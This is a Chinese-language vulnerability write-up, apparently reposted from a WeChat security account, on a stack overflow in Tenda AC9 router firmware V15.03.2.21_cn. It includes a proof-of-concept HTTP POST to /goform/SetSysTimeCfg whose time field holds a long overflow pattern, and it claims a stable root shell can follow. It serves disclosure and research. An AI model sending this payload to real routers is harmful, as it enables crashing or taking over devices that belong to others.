腾达AC9 V15.03.2.21_cn栈溢出分析

admin 2022年4月21日12:34:51IoT工控物联网评论10 views3617字阅读12分3秒阅读模式

点击上方蓝字“Ots安全”一起玩耍

概述

厂家网站信息:https://www.tenda.com.cn/profile/contact.html

固件下载地址:https ://www.tenda.com.cn/download/default.html

  1. 受影响的版本

腾达AC9 V15.03.2.21_cn栈溢出分析

图1为路由器最新固件Ba


漏洞详情

腾达AC9 V15.03.2.21_cn栈溢出分析

通过分析发现存在典型的栈溢出漏洞V20是时间参数。怎么进入这个分支我们需要把S1的值设置为手动上去

腾达AC9 V15.03.2.21_cn栈溢出分析

可以发现,当程序调用这个接口的时候,timetype会被设置为sync,那么下面我们就进入正常的时间设置流程了

腾达AC9 V15.03.2.21_cn栈溢出分析

这是界面,但是我们没有找到设置时间的地方,但是手动设置时间存在溢出点所以需要自己构造一个包

POST /goform/SetSysTimeCfg HTTP/1.1Host: 192.168.11.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 2038Origin: http://192.168.11.1Connection: closeReferer: http://192.168.11.1/system_time.html?random=0.1562532683666097&Cookie: password=7c90ed4e4d4bf1e300aa08103057ccbcddm1qw

timeType=manual&time=2021-1-20%2010:21

这里按照sscanf的规律,猜测时间格式年月日时:分,然后我们在任意匹配的位置添加大量字符,导致栈溢出漏洞


反复出现的漏洞和 POC

为了重现漏洞,可以遵循以下步骤:

  1. 使用胖子模拟固件V15.03.2.21_cn

  2. 使用以下 POC 攻击进行攻击

POST /goform/SetSysTimeCfg HTTP/1.1Host: 192.168.11.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 2038Origin: http://192.168.11.1Connection: closeReferer: http://192.168.11.1/system_time.html?random=0.1562532683666097&Cookie: password=7c90ed4e4d4bf1e300aa08103057ccbcddm1qw
timeType=manual&time=2021aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae-1-20%2010:21

复现结果如下:

腾达AC9 V15.03.2.21_cn栈溢出分析


图2 POC攻击效果

最后可以写exp,可以达到很稳定的获取root shell的效果

腾达AC9 V15.03.2.21_cn栈溢出分析

腾达AC9 V15.03.2.21_cn栈溢出分析

原文始发于微信公众号(Ots安全):腾达AC9 V15.03.2.21_cn栈溢出分析

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月21日12:34:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  腾达AC9 V15.03.2.21_cn栈溢出分析 http://cn-sec.com/archives/931723.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: